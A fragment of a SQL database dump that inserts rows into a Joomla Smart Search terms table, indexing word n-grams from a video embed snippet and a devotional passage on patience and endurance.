(289417, 'envato sting mp4', 'envato sting mp4', 0, 1, 1.5333, 'E513235251', 1, '*'),
(289418, 'envato sting ogv', 'envato sting ogv', 0, 1, 1.5333, 'E51323521', 1, '*'),
(289419, 'envato sting webm', 'envato sting webm', 0, 1, 1.5667, 'E513235215', 1, '*'),
(289420, 'height', 'height', 0, 0, 0.4, 'H230', 1, '*'),
(289421, 'height 420', 'height 420', 0, 1, 1.3333, 'H230', 1, '*'),
(289422, 'height 420 poster', 'height 420 poster', 0, 1, 1.5667, 'H231236', 1, '*'),
(289423, 'images demo video', 'imag demo video', 0, 1, 1.5667, 'I523513', 1, '*'),
(289424, 'item 6', 'item 6', 0, 1, 1.2, 'I350', 1, '*'),
(289425, 'item 6 you', 'item 6 you', 0, 1, 1.3333, 'I350', 1, '*'),
(289426, 'k2 item 6', 'k2 item 6', 0, 1, 1.3, 'K350', 1, '*'),
(289427, 'live once', 'live once', 0, 1, 1.3, 'L152', 1, '*'),
(289428, 'live once live', 'live once live', 0, 1, 1.4667, 'L15241', 1, '*'),
(289429, 'live well', 'live well', 0, 1, 1.3, 'L140', 1, '*'),
(289430, 'movie', 'movi', 0, 0, 0.3333, 'M100', 1, '*'),
(289431, 'movie bg', 'movi bg', 0, 1, 1.2667, 'M120', 1, '*'),
(289432, 'movie bg png', 'movi bg png', 0, 1, 1.4, 'M12152', 1, '*'),
(289433, 'mp4', 'mp4', 0, 0, 0.2, 'M100', 1, '*'),
(289434, 'mp4 source', 'mp4 source', 0, 1, 1.3333, 'M1262', 1, '*'),
(289435, 'mp4 source source', 'mp4 source source', 0, 1, 1.5667, 'M126262', 1, '*'),
(289436, 'mp4 url', 'mp4 url', 0, 1, 1.2333, 'M164', 1, '*'),
(289437, 'mp4 url images', 'mp4 url images', 0, 1, 1.4667, 'M16452', 1, '*'),
(289438, 'ogg', 'ogg', 0, 0, 0.2, 'O200', 1, '*'),
(289439, 'ogg url', 'ogg url', 0, 1, 1.2333, 'O264', 1, '*'),
(289440, 'ogg url images', 'ogg url images', 0, 1, 1.4667, 'O26452', 1, '*'),
(289441, 'ogv', 'ogv', 0, 0, 0.2, 'O210', 1, '*'),
(289442, 'ogv source', 'ogv source', 0, 1, 1.3333, 'O21262', 1, '*'),
(289443, 'ogv source source', 'ogv source source', 0, 1, 1.5667, 'O2126262', 1, '*'),
(289444, 'once live', 'onc live', 0, 1, 1.3, 'O5241', 1, '*'),
(289445, 'once live well', 'onc live well', 0, 1, 1.4667, 'O52414', 1, '*'),
(289446, 'only live', 'onli live', 0, 1, 1.3, 'O541', 1, '*'),
(289447, 'only live once', 'onli live once', 0, 1, 1.4667, 'O54152', 1, '*'),
(289448, 'png', 'png', 0, 0, 0.2, 'P520', 1, '*'),
(289449, 'png source', 'png source', 0, 1, 1.3333, 'P5262', 1, '*'),
(289450, 'png source type', 'png source type', 0, 1, 1.5, 'P526231', 1, '*'),
(289451, 'poster', 'poster', 0, 0, 0.4, 'P236', 1, '*'),
(289452, 'poster images', 'poster images', 0, 1, 1.4333, 'P23652', 1, '*'),
(289453, 'poster images demo', 'poster images demo', 0, 1, 1.6, 'P2365235', 1, '*'),
(289454, 'source source', 'sourc source', 0, 1, 1.4333, 'S6262', 1, '*'),
(289455, 'source source type', 'sourc source type', 0, 1, 1.6, 'S626231', 1, '*'),
(289456, 'source type', 'sourc type', 0, 1, 1.3667, 'S6231', 1, '*'),
(289457, 'source type video', 'sourc type video', 0, 1, 1.5667, 'S62313', 1, '*'),
(289458, 'source video', 'sourc video', 0, 1, 1.4, 'S6213', 1, '*'),
(289459, 'source video perhaps', 'sourc video perhaps', 0, 1, 1.6667, 'S62131612', 1, '*'),
(289460, 'sting', 'sting', 0, 0, 0.3333, 'S352', 1, '*'),
(289461, 'sting mp4', 'sting mp4', 0, 1, 1.3, 'S35251', 1, '*'),
(289462, 'sting mp4 source', 'sting mp4 source', 0, 1, 1.5333, 'S35251262', 1, '*'),
(289463, 'sting ogv', 'sting ogv', 0, 1, 1.3, 'S3521', 1, '*'),
(289464, 'sting ogv source', 'sting ogv source', 0, 1, 1.5333, 'S3521262', 1, '*'),
(289465, 'sting webm', 'sting webm', 0, 1, 1.3333, 'S35215', 1, '*'),
(289466, 'sting webm source', 'sting webm source', 0, 1, 1.5667, 'S35215262', 1, '*'),
(289467, 'type video', 'type video', 0, 1, 1.3333, 'T130', 1, '*'),
(289468, 'type video mp4', 'type video mp4', 0, 1, 1.4667, 'T1351', 1, '*'),
(289469, 'type video ogg', 'type video ogg', 0, 1, 1.4667, 'T132', 1, '*'),
(289470, 'type video webm', 'type video webm', 0, 1, 1.5, 'T1315', 1, '*'),
(289471, 'url', 'url', 0, 0, 0.2, 'U640', 1, '*'),
(289472, 'url images', 'url images', 0, 1, 1.3333, 'U6452', 1, '*'),
(289473, 'url images demo', 'url images demo', 0, 1, 1.5, 'U645235', 1, '*'),
(289474, 'video envato', 'video envato', 0, 1, 1.4, 'V3513', 1, '*'),
(289475, 'video envato sting', 'video envato sting', 0, 1, 1.6, 'V35132352', 1, '*'),
(289476, 'video movie', 'video movie', 0, 1, 1.3667, 'V351', 1, '*'),
(289477, 'video movie bg', 'video movie bg', 0, 1, 1.4667, 'V3512', 1, '*'),
(289478, 'video mp4', 'video mp4', 0, 1, 1.3, 'V351', 1, '*'),
(289479, 'video mp4 url', 'video mp4 url', 0, 1, 1.4333, 'V35164', 1, '*'),
(289480, 'video ogg', 'video ogg', 0, 1, 1.3, 'V320', 1, '*'),
(289481, 'video ogg url', 'video ogg url', 0, 1, 1.4333, 'V3264', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(289482, 'video perhaps', 'video perhaps', 0, 1, 1.4333, 'V31612', 1, '*'),
(289483, 'video perhaps travel', 'video perhaps travel', 0, 1, 1.6667, 'V316123614', 1, '*'),
(289484, 'video webm', 'video webm', 0, 1, 1.3333, 'V315', 1, '*'),
(289485, 'video webm url', 'video webm url', 0, 1, 1.4667, 'V31564', 1, '*'),
(289486, 'video width', 'video width', 0, 1, 1.3667, 'V300', 1, '*'),
(289487, 'video width 100', 'video width 100', 0, 1, 1.5, 'V300', 1, '*'),
(289488, 'webm', 'webm', 0, 0, 0.2667, 'W150', 1, '*'),
(289489, 'webm source', 'webm source', 0, 1, 1.3667, 'W15262', 1, '*'),
(289490, 'webm source video', 'webm source video', 0, 1, 1.5667, 'W1526213', 1, '*'),
(289491, 'webm url', 'webm url', 0, 1, 1.2667, 'W1564', 1, '*'),
(289492, 'webm url images', 'webm url images', 0, 1, 1.5, 'W156452', 1, '*'),
(289493, 'width', 'width', 0, 0, 0.3333, 'W300', 1, '*'),
(289494, 'width 100', 'width 100', 0, 1, 1.3, 'W300', 1, '*'),
(289495, 'width 100 height', 'width 100 height', 0, 1, 1.5333, 'W323', 1, '*'),
(289496, 'you only live', 'you only live', 0, 1, 1.4333, 'Y541', 1, '*'),
(289529, '7 patience', '7 patience', 0, 1, 1.3333, 'P352', 1, '*'),
(289530, 'a destination', 'a destination', 0, 1, 1.4333, 'A323535', 1, '*'),
(289531, 'a destination but', 'a destination but', 0, 1, 1.5667, 'A32353513', 1, '*'),
(289532, 'a destination to', 'a destination to', 0, 1, 1.5333, 'A3235353', 1, '*'),
(289533, 'a long distance', 'a long distance', 0, 1, 1.5, 'A45232352', 1, '*'),
(289534, 'a patience', 'a patience', 0, 1, 1.3333, 'A1352', 1, '*'),
(289535, 'a patience that', 'a patience that', 0, 1, 1.5, 'A13523', 1, '*'),
(289536, 'a person', 'a person', 0, 1, 1.2667, 'A1625', 2, '*'),
(289537, 'a person to', 'a person to', 0, 1, 1.3667, 'A16253', 1, '*'),
(289538, 'about doing', 'about doing', 0, 1, 1.3667, 'A1352', 1, '*'),
(289539, 'about doing what', 'about doing what', 0, 1, 1.5333, 'A13523', 1, '*'),
(289540, 'after so', 'after so', 0, 1, 1.2667, 'A1362', 1, '*'),
(289541, 'after so that', 'after so that', 0, 1, 1.4333, 'A13623', 1, '*'),
(289542, 'after you have', 'after you have', 0, 1, 1.4667, 'A1361', 2, '*'),
(289543, 'after you receive', 'after you receive', 0, 1, 1.5667, 'A13621', 1, '*'),
(289544, 'ago', 'ago', 0, 0, 0.2, 'A200', 3, '*'),
(289545, 'ago that', 'ago that', 0, 1, 1.2667, 'A230', 2, '*'),
(289546, 'ago that if', 'ago that if', 0, 1, 1.3667, 'A231', 1, '*'),
(289547, 'all is', 'all is', 0, 1, 1.2, 'A420', 1, '*'),
(289548, 'all is about', 'all is about', 0, 1, 1.4, 'A4213', 1, '*'),
(289549, 'all keep', 'all keep', 0, 1, 1.2667, 'A421', 1, '*'),
(289550, 'all keep sowing', 'all keep sowing', 0, 1, 1.5, 'A421252', 1, '*'),
(289551, 'all that god', 'all that god', 0, 1, 1.4, 'A4323', 1, '*'),
(289552, 'all that the', 'all that the', 0, 1, 1.4, 'A430', 1, '*'),
(289553, 'all that you', 'all that you', 0, 1, 1.4, 'A430', 1, '*'),
(289554, 'all the bible', 'all the bible', 0, 1, 1.4333, 'A4314', 1, '*'),
(289555, 'all the books', 'all the books', 0, 1, 1.4333, 'A4312', 1, '*'),
(289556, 'allow for', 'allow for', 0, 1, 1.3, 'A416', 1, '*'),
(289557, 'allow for god', 'allow for god', 0, 1, 1.4333, 'A41623', 1, '*'),
(289558, 'allows you', 'allow you', 0, 1, 1.3333, 'A420', 1, '*'),
(289559, 'allows you to', 'allow you to', 0, 1, 1.4333, 'A423', 1, '*'),
(289560, 'also the', 'also the', 0, 1, 1.2667, 'A423', 1, '*'),
(289561, 'also the words', 'also the words', 0, 1, 1.4667, 'A423632', 1, '*'),
(289562, 'always want', 'alwai want', 0, 1, 1.3667, 'A4253', 1, '*'),
(289563, 'always want to', 'alwai want to', 0, 1, 1.4667, 'A4253', 1, '*'),
(289564, 'an unfolding', 'an unfolding', 0, 1, 1.4, 'A514352', 1, '*'),
(289565, 'an unfolding journey', 'an unfolding journey', 0, 1, 1.6667, 'A51435265', 1, '*'),
(289566, 'and endurance', 'and endurance', 0, 1, 1.4333, 'A5353652', 1, '*'),
(289567, 'and endurance are', 'and endurance are', 0, 1, 1.5667, 'A53536526', 1, '*'),
(289568, 'and even when', 'and even when', 0, 1, 1.4333, 'A5315', 1, '*'),
(289569, 'and keep giving', 'and keep giving', 0, 1, 1.5, 'A53212152', 1, '*'),
(289570, 'and keep putting', 'and keep putting', 0, 1, 1.5333, 'A5321352', 1, '*'),
(289571, 'and stand therefore', 'and stand therefore', 0, 1, 1.6333, 'A532353616', 1, '*'),
(289572, 'and start you', 'and start you', 0, 1, 1.4333, 'A532363', 1, '*'),
(289573, 'and that “stand”', 'and that “stand”', 0, 1, 1.5333, 'A532353', 1, '*'),
(289574, 'and through', 'and through', 0, 1, 1.3667, 'A5362', 1, '*'),
(289575, 'and through us', 'and through us', 0, 1, 1.4667, 'A5362', 1, '*'),
(289576, 'are dealing', 'ar dealing', 0, 1, 1.3667, 'A63452', 1, '*'),
(289577, 'are dealing with', 'ar dealing with', 0, 1, 1.5333, 'A634523', 1, '*'),
(289578, 'are doing for', 'ar doing for', 0, 1, 1.4333, 'A635216', 1, '*'),
(289579, 'are just starting', 'ar just starting', 0, 1, 1.5667, 'A623236352', 1, '*'),
(289580, 'are some things', 'ar some things', 0, 1, 1.5, 'A625352', 2, '*'),
(289581, 'are triplets', 'ar triplets', 0, 1, 1.4, 'A6361432', 1, '*'),
(289582, 'are triplets of', 'ar triplets of', 0, 1, 1.5, 'A63614321', 1, '*'),
(289583, 'arrival', 'arriv', 0, 0, 0.4667, 'A614', 2, '*'),
(289584, 'arrival god', 'arriv god', 0, 1, 1.3667, 'A61423', 1, '*'),
(289585, 'arrival god many', 'arriv god many', 0, 1, 1.5333, 'A614235', 1, '*'),
(289586, 'arrive too', 'arriv too', 0, 1, 1.3333, 'A613', 1, '*'),
(289587, 'arrive too soon', 'arriv too soon', 0, 1, 1.5, 'A61325', 1, '*'),
(289588, 'as people', 'as people', 0, 1, 1.3, 'A214', 1, '*'),
(289589, 'as people must', 'as people must', 0, 1, 1.4667, 'A214523', 1, '*'),
(289590, 'asking you', 'ask you', 0, 1, 1.3333, 'A252', 1, '*'),
(289591, 'asking you to', 'ask you to', 0, 1, 1.4333, 'A2523', 1, '*'),
(289592, 'avoidable mistakes there', 'avoid mistakes there', 0, 1, 1.8, 'A1314523236', 1, '*'),
(289593, 'be patient with', 'be patient with', 0, 1, 1.5, 'B353', 1, '*'),
(289594, 'because to', 'becaus to', 0, 1, 1.3333, 'B230', 1, '*'),
(289595, 'because to them', 'becaus to them', 0, 1, 1.5, 'B235', 1, '*'),
(289596, 'before but', 'befor but', 0, 1, 1.3333, 'B613', 1, '*'),
(289597, 'before but after', 'befor but after', 0, 1, 1.5333, 'B613136', 1, '*'),
(289598, 'believe you did', 'believ you did', 0, 1, 1.5, 'B413', 1, '*'),
(289599, 'best may', 'best may', 0, 1, 1.2667, 'B235', 1, '*'),
(289600, 'best may you', 'best may you', 0, 1, 1.4, 'B235', 1, '*'),
(289601, 'better there', 'better there', 0, 1, 1.4, 'B3636', 1, '*'),
(289602, 'better there are', 'better there are', 0, 1, 1.5333, 'B3636', 1, '*'),
(289603, 'bible says stand', 'bibl says stand', 0, 1, 1.5333, 'B42353', 1, '*'),
(289604, 'bible says you', 'bibl says you', 0, 1, 1.4667, 'B420', 1, '*'),
(289605, 'books that', 'book that', 0, 1, 1.3333, 'B230', 1, '*'),
(289606, 'books that god', 'book that god', 0, 1, 1.4667, 'B2323', 1, '*'),
(289607, 'books that i', 'book that i', 0, 1, 1.4, 'B230', 1, '*'),
(289608, 'but after so', 'but after so', 0, 1, 1.4, 'B31362', 1, '*'),
(289609, 'but an', 'but an', 0, 1, 1.2, 'B350', 1, '*'),
(289610, 'but an unfolding', 'but an unfolding', 0, 1, 1.5333, 'B3514352', 1, '*'),
(289611, 'calling and start', 'call and start', 0, 1, 1.5667, 'C452532363', 1, '*'),
(289612, 'can cause', 'can cause', 0, 1, 1.3, 'C520', 1, '*'),
(289613, 'can cause a', 'can cause a', 0, 1, 1.3667, 'C520', 1, '*'),
(289614, 'can obtain what', 'can obtain what', 0, 1, 1.5, 'C51353', 1, '*'),
(289615, 'can\'t write', 'can write', 0, 1, 1.3667, 'C5363', 1, '*'),
(289616, 'can\'t write all', 'can write all', 0, 1, 1.5, 'C53634', 1, '*'),
(289617, 'cause a', 'caus a', 0, 1, 1.2333, 'C000', 1, '*'),
(289618, 'cause a person', 'caus a person', 0, 1, 1.4667, 'C1625', 1, '*'),
(289619, 'constancy', 'constanc', 0, 0, 0.6, 'C52352', 1, '*'),
(289620, 'constancy in', 'constanc in', 0, 1, 1.4, 'C523525', 1, '*'),
(289621, 'constancy in what', 'constanc in what', 0, 1, 1.5667, 'C5235253', 1, '*'),
(289622, 'days to develop', 'dai to develop', 0, 1, 1.5, 'D23141', 1, '*'),
(289623, 'dealing with god', 'deal with god', 0, 1, 1.5333, 'D452323', 1, '*'),
(289624, 'destination but', 'destin but', 0, 1, 1.5, 'D2353513', 1, '*'),
(289625, 'destination but an', 'destin but an', 0, 1, 1.6, 'D23535135', 1, '*'),
(289626, 'destination to', 'destin to', 0, 1, 1.4667, 'D235353', 1, '*'),
(289627, 'destination to the', 'destin to the', 0, 1, 1.6, 'D235353', 1, '*'),
(289628, 'develop stamina', 'develop stamina', 0, 1, 1.5, 'D141235', 1, '*'),
(289629, 'develop stamina for', 'develop stamina for', 0, 1, 1.6333, 'D14123516', 1, '*'),
(289630, 'devil while', 'devil while', 0, 1, 1.3667, 'D140', 1, '*'),
(289631, 'devil while patience', 'devil while patience', 0, 1, 1.6667, 'D141352', 1, '*'),
(289632, 'did five', 'did five', 0, 1, 1.2667, 'D100', 1, '*'),
(289633, 'did five years', 'did five years', 0, 1, 1.4667, 'D162', 1, '*'),
(289634, 'disrupts', 'disrupt', 0, 0, 0.5333, 'D26132', 1, '*'),
(289635, 'disrupts the', 'disrupt the', 0, 1, 1.4, 'D261323', 1, '*'),
(289636, 'disrupts the work', 'disrupt the work', 0, 1, 1.5667, 'D26132362', 1, '*'),
(289637, 'distance', 'distanc', 0, 0, 0.5333, 'D2352', 1, '*'),
(289638, 'distance race', 'distanc race', 0, 1, 1.4333, 'D235262', 1, '*'),
(289639, 'distance race after', 'distanc race after', 0, 1, 1.6333, 'D235262136', 1, '*'),
(289640, 'distance trip', 'distanc trip', 0, 1, 1.4333, 'D2352361', 1, '*'),
(289641, 'distance trip immature', 'distanc trip immature', 0, 1, 1.7333, 'D2352361536', 1, '*'),
(289642, 'distance whatever', 'distanc whatever', 0, 1, 1.5667, 'D2352316', 1, '*'),
(289643, 'distance whatever god', 'distanc whatever god', 0, 1, 1.7, 'D235231623', 1, '*'),
(289644, 'divine working', 'divin working', 0, 1, 1.4667, 'D156252', 1, '*'),
(289645, 'do god', 'do god', 0, 1, 1.2, 'D230', 1, '*'),
(289646, 'do god is', 'do god is', 0, 1, 1.3, 'D232', 1, '*'),
(289647, 'do having', 'do having', 0, 1, 1.3, 'D152', 1, '*'),
(289648, 'do having done', 'do having done', 0, 1, 1.4667, 'D15235', 1, '*'),
(289649, 'do in', 'do in', 0, 1, 1.1667, 'D500', 1, '*'),
(289650, 'do in us', 'do in us', 0, 1, 1.2667, 'D520', 1, '*'),
(289651, 'do patience', 'do patience', 0, 1, 1.3667, 'D1352', 1, '*'),
(289652, 'do patience is', 'do patience is', 0, 1, 1.4667, 'D1352', 1, '*'),
(289653, 'do them better', 'do them better', 0, 1, 1.4667, 'D5136', 1, '*'),
(289654, 'do them now', 'do them now', 0, 1, 1.3667, 'D500', 1, '*'),
(289655, 'doing for', 'do for', 0, 1, 1.3, 'D5216', 1, '*'),
(289656, 'doing for him', 'do for him', 0, 1, 1.4333, 'D52165', 1, '*'),
(289657, 'doing what', 'do what', 0, 1, 1.3333, 'D523', 1, '*'),
(289658, 'doing what is', 'do what is', 0, 1, 1.4333, 'D5232', 1, '*'),
(289659, 'done all', 'done all', 0, 1, 1.2667, 'D540', 1, '*'),
(289660, 'done all is', 'done all is', 0, 1, 1.3667, 'D542', 1, '*'),
(289661, 'done all the', 'done all the', 0, 1, 1.4, 'D543', 1, '*'),
(289662, 'done the', 'done the', 0, 1, 1.2667, 'D530', 1, '*'),
(289663, 'done the will', 'done the will', 0, 1, 1.4333, 'D534', 1, '*'),
(289664, 'down to', 'down to', 0, 1, 1.2333, 'D530', 1, '*'),
(289665, 'down to a', 'down to a', 0, 1, 1.3, 'D530', 1, '*'),
(289666, 'endurance', 'endur', 0, 0, 0.6, 'E53652', 1, '*'),
(289667, 'endurance are', 'endur are', 0, 1, 1.4333, 'E536526', 1, '*'),
(289668, 'endurance are triplets', 'endur are triplets', 0, 1, 1.7333, 'E536526361432', 1, '*'),
(289669, 'endurance when', 'endur when', 0, 1, 1.4667, 'E536525', 1, '*'),
(289670, 'endurance when you', 'endur when you', 0, 1, 1.6, 'E536525', 1, '*'),
(289671, 'exercise patience', 'exercis patience', 0, 1, 1.5667, 'E2621352', 1, '*'),
(289672, 'father has prepared', 'father has prepared', 0, 1, 1.6333, 'F36216163', 1, '*'),
(289673, 'father you', 'father you', 0, 1, 1.3333, 'F360', 1, '*'),
(289674, 'father you need', 'father you need', 0, 1, 1.5, 'F3653', 1, '*'),
(289675, 'five', 'five', 0, 0, 0.2667, 'F000', 1, '*'),
(289676, 'five years', 'five years', 0, 1, 1.3333, 'F620', 1, '*'),
(289677, 'five years ago', 'five years ago', 0, 1, 1.4667, 'F620', 1, '*'),
(289678, 'for him impatience', 'for him impatience', 0, 1, 1.6, 'F651352', 1, '*'),
(289679, 'for the long', 'for the long', 0, 1, 1.4, 'F63452', 1, '*'),
(289680, 'for the salvation', 'for the salvation', 0, 1, 1.5667, 'F6324135', 1, '*'),
(289681, 'giving your', 'give your', 0, 1, 1.3667, 'G1526', 1, '*'),
(289682, 'giving your all', 'give your all', 0, 1, 1.5, 'G15264', 1, '*'),
(289683, 'god allows', 'god allows', 0, 1, 1.3333, 'G342', 1, '*'),
(289684, 'god allows you', 'god allows you', 0, 1, 1.4667, 'G342', 1, '*'),
(289685, 'god also', 'god also', 0, 1, 1.2667, 'G342', 1, '*'),
(289686, 'god also the', 'god also the', 0, 1, 1.4, 'G3423', 1, '*'),
(289687, 'god god', 'god god', 0, 1, 1.2333, 'G323', 3, '*'),
(289688, 'god god requires', 'god god requires', 0, 1, 1.5333, 'G3236262', 1, '*'),
(289689, 'god is asking', 'god is asking', 0, 1, 1.4333, 'G3252', 2, '*'),
(289690, 'god is never', 'god is never', 0, 1, 1.4, 'G32516', 1, '*'),
(289691, 'god keep', 'god keep', 0, 1, 1.2667, 'G321', 1, '*'),
(289692, 'god keep using', 'god keep using', 0, 1, 1.4667, 'G321252', 1, '*'),
(289693, 'god many', 'god many', 0, 1, 1.2667, 'G350', 1, '*'),
(289694, 'god many times', 'god many times', 0, 1, 1.4667, 'G35352', 1, '*'),
(289695, 'god not', 'god not', 0, 1, 1.2333, 'G353', 1, '*'),
(289696, 'god not before', 'god not before', 0, 1, 1.4667, 'G35316', 1, '*'),
(289697, 'god requires constancy', 'god requires constancy', 0, 1, 1.7333, 'G3626252352', 1, '*'),
(289698, 'god stand', 'god stand', 0, 1, 1.3, 'G32353', 1, '*'),
(289699, 'god stand and', 'god stand and', 0, 1, 1.4333, 'G3235353', 1, '*'),
(289700, 'god the bible', 'god the bible', 0, 1, 1.4333, 'G314', 1, '*'),
(289701, 'gotten to', 'gotten to', 0, 1, 1.3, 'G353', 1, '*'),
(289702, 'gotten to the', 'gotten to the', 0, 1, 1.4333, 'G353', 1, '*'),
(289703, 'has placed in', 'ha placed in', 0, 1, 1.4333, 'H214235', 1, '*'),
(289704, 'have done the', 'have done the', 0, 1, 1.4333, 'H1353', 1, '*'),
(289705, 'have gotten to', 'have gotten to', 0, 1, 1.4667, 'H12353', 1, '*'),
(289706, 'have need', 'have need', 0, 1, 1.3, 'H153', 1, '*'),
(289707, 'have need of', 'have need of', 0, 1, 1.4, 'H1531', 1, '*'),
(289708, 'have sufficient', 'have sufficient', 0, 1, 1.5, 'H121253', 1, '*'),
(289709, 'have sufficient patience', 'have sufficient patience', 0, 1, 1.8, 'H1212531352', 1, '*'),
(289710, 'have written', 'have written', 0, 1, 1.4, 'H1635', 1, '*'),
(289711, 'have written that', 'have written that', 0, 1, 1.5667, 'H16353', 1, '*'),
(289712, 'have you done', 'have you done', 0, 1, 1.4333, 'H135', 1, '*'),
(289713, 'having done', 'have done', 0, 1, 1.3667, 'H15235', 1, '*'),
(289714, 'having done all', 'have done all', 0, 1, 1.5, 'H152354', 1, '*'),
(289715, 'he intends', 'he intends', 0, 1, 1.3333, 'H53532', 1, '*'),
(289716, 'he intends to', 'he intends to', 0, 1, 1.4333, 'H535323', 1, '*'),
(289717, 'he promised', 'he promised', 0, 1, 1.3667, 'H16523', 1, '*'),
(289718, 'he promised have', 'he promised have', 0, 1, 1.5333, 'H165231', 1, '*'),
(289719, 'him impatience', 'him impatience', 0, 1, 1.4667, 'H51352', 1, '*'),
(289720, 'him impatience disrupts', 'him impatience disrupts', 0, 1, 1.7667, 'H51352326132', 1, '*'),
(289721, 'his people impatience', 'hi people impatience', 0, 1, 1.7, 'H21451352', 1, '*'),
(289722, 'i believe you', 'i believe you', 0, 1, 1.4333, 'I141', 1, '*'),
(289723, 'i have written', 'i have written', 0, 1, 1.4667, 'I1635', 1, '*'),
(289724, 'i read', 'i read', 0, 1, 1.2, 'I630', 1, '*'),
(289725, 'i read them', 'i read them', 0, 1, 1.3667, 'I635', 1, '*'),
(289726, 'immature', 'immatur', 0, 0, 0.5333, 'I536', 1, '*'),
(289727, 'immature people', 'immatur people', 0, 1, 1.5, 'I53614', 1, '*'),
(289728, 'immature people always', 'immatur people always', 0, 1, 1.7333, 'I536142', 1, '*'),
(289729, 'impatience', 'impati', 0, 0, 0.6667, 'I51352', 1, '*'),
(289730, 'impatience can', 'impati can', 0, 1, 1.4667, 'I513525', 1, '*'),
(289731, 'impatience can cause', 'impati can cause', 0, 1, 1.6667, 'I5135252', 1, '*'),
(289732, 'impatience disrupts', 'impati disrupts', 0, 1, 1.6333, 'I51352326132', 1, '*'),
(289733, 'impatience disrupts the', 'impati disrupts the', 0, 1, 1.7667, 'I513523261323', 1, '*'),
(289734, 'impossible for', 'imposs for', 0, 1, 1.4667, 'I5121416', 1, '*'),
(289735, 'impossible for you', 'imposs for you', 0, 1, 1.6, 'I5121416', 1, '*'),
(289736, 'in one year', 'in one year', 0, 1, 1.3667, 'I560', 1, '*'),
(289737, 'in the lives', 'in the lives', 0, 1, 1.4, 'I53412', 1, '*'),
(289738, 'in this new', 'in this new', 0, 1, 1.3667, 'I5325', 1, '*'),
(289739, 'in us', 'in us', 0, 1, 1.1667, 'I520', 1, '*'),
(289740, 'in us with', 'in us with', 0, 1, 1.3333, 'I523', 1, '*'),
(289741, 'in what you', 'in what you', 0, 1, 1.3667, 'I530', 1, '*'),
(289742, 'intends', 'intend', 0, 0, 0.4667, 'I53532', 1, '*'),
(289743, 'intends to', 'intend to', 0, 1, 1.3333, 'I535323', 1, '*'),
(289744, 'intends to do', 'intend to do', 0, 1, 1.4333, 'I535323', 1, '*'),
(289745, 'into all', 'into all', 0, 1, 1.2667, 'I534', 1, '*'),
(289746, 'into all that', 'into all that', 0, 1, 1.4333, 'I5343', 1, '*'),
(289747, 'is a destination', 'is a destination', 0, 1, 1.5333, 'I2323535', 1, '*'),
(289748, 'is a long', 'is a long', 0, 1, 1.3, 'I2452', 1, '*'),
(289749, 'is a patience', 'is a patience', 0, 1, 1.4333, 'I21352', 1, '*'),
(289750, 'is about doing', 'is about doing', 0, 1, 1.4667, 'I21352', 1, '*'),
(289751, 'is asking', 'is asking', 0, 1, 1.3, 'I252', 2, '*'),
(289752, 'is asking you', 'is asking you', 0, 1, 1.4333, 'I252', 1, '*'),
(289753, 'is impossible for', 'is impossible for', 0, 1, 1.5667, 'I25121416', 1, '*'),
(289754, 'is legitimately', 'is legitimately', 0, 1, 1.5, 'I2423534', 1, '*'),
(289755, 'is legitimately possible', 'is legitimately possible', 0, 1, 1.8, 'I24235341214', 1, '*'),
(289756, 'is never', 'is never', 0, 1, 1.2667, 'I2516', 1, '*'),
(289757, 'is never asking', 'is never asking', 0, 1, 1.5, 'I2516252', 1, '*'),
(289758, 'is not possible', 'is not possible', 0, 1, 1.5, 'I2531214', 1, '*'),
(289759, 'is required of', 'is required of', 0, 1, 1.4667, 'I262631', 1, '*'),
(289760, 'is the all', 'is the all', 0, 1, 1.3333, 'I234', 1, '*'),
(289761, 'is waiting', 'is waiting', 0, 1, 1.3333, 'I2352', 1, '*'),
(289762, 'is waiting for', 'is waiting for', 0, 1, 1.4667, 'I235216', 1, '*'),
(289763, 'is what you', 'is what you', 0, 1, 1.3667, 'I230', 2, '*'),
(289764, 'item 7', 'item 7', 0, 1, 1.2, 'I350', 1, '*'),
(289765, 'item 7 patience', 'item 7 patience', 0, 1, 1.5, 'I351352', 1, '*'),
(289766, 'journey and even', 'journei and even', 0, 1, 1.5333, 'J65315', 1, '*'),
(289767, 'just as people', 'just as people', 0, 1, 1.4667, 'J3214', 1, '*'),
(289768, 'just starting', 'just starting', 0, 1, 1.4333, 'J3236352', 1, '*'),
(289769, 'just starting so', 'just starting so', 0, 1, 1.5333, 'J3236352', 1, '*'),
(289770, 'k2 item 7', 'k2 item 7', 0, 1, 1.3, 'K350', 1, '*'),
(289771, 'keep giving', 'keep giving', 0, 1, 1.3667, 'K12152', 1, '*'),
(289772, 'keep giving your', 'keep giving your', 0, 1, 1.5333, 'K121526', 1, '*'),
(289773, 'keep putting', 'keep putting', 0, 1, 1.4, 'K1352', 1, '*'),
(289774, 'keep putting out', 'keep putting out', 0, 1, 1.5333, 'K13523', 1, '*'),
(289775, 'keep sowing', 'keep sowing', 0, 1, 1.3667, 'K1252', 1, '*'),
(289776, 'keep sowing seed', 'keep sowing seed', 0, 1, 1.5333, 'K12523', 1, '*'),
(289777, 'keep using', 'keep using', 0, 1, 1.3333, 'K1252', 1, '*'),
(289778, 'keep using your', 'keep using your', 0, 1, 1.5, 'K12526', 1, '*'),
(289779, 'know that is', 'know that is', 0, 1, 1.4, 'K532', 1, '*'),
(289780, 'legitimately', 'legitim', 0, 0, 0.8, 'L23534', 1, '*'),
(289781, 'legitimately possible', 'legitim possible', 0, 1, 1.7, 'L235341214', 1, '*'),
(289782, 'legitimately possible for', 'legitim possible for', 0, 1, 1.8333, 'L23534121416', 1, '*'),
(289783, 'likely you', 'like you', 0, 1, 1.3333, 'L240', 1, '*'),
(289784, 'likely you will', 'like you will', 0, 1, 1.5, 'L240', 1, '*'),
(289785, 'lives of', 'live of', 0, 1, 1.2667, 'L121', 1, '*'),
(289786, 'lives of his', 'live of his', 0, 1, 1.4, 'L1212', 1, '*'),
(289787, 'long distance', 'long distance', 0, 1, 1.4333, 'L5232352', 1, '*'),
(289788, 'long distance race', 'long distance race', 0, 1, 1.6, 'L523235262', 1, '*'),
(289789, 'long distance trip', 'long distance trip', 0, 1, 1.6, 'L5232352361', 1, '*'),
(289790, 'long distance whatever', 'long distance whatever', 0, 1, 1.7333, 'L5232352316', 1, '*'),
(289791, 'longsuffering', 'longsuff', 0, 0, 0.8667, 'L521652', 1, '*'),
(289792, 'longsuffering and', 'longsuff and', 0, 1, 1.5667, 'L52165253', 1, '*'),
(289793, 'longsuffering and endurance', 'longsuff and endurance', 0, 1, 1.9, 'L5216525353652', 1, '*'),
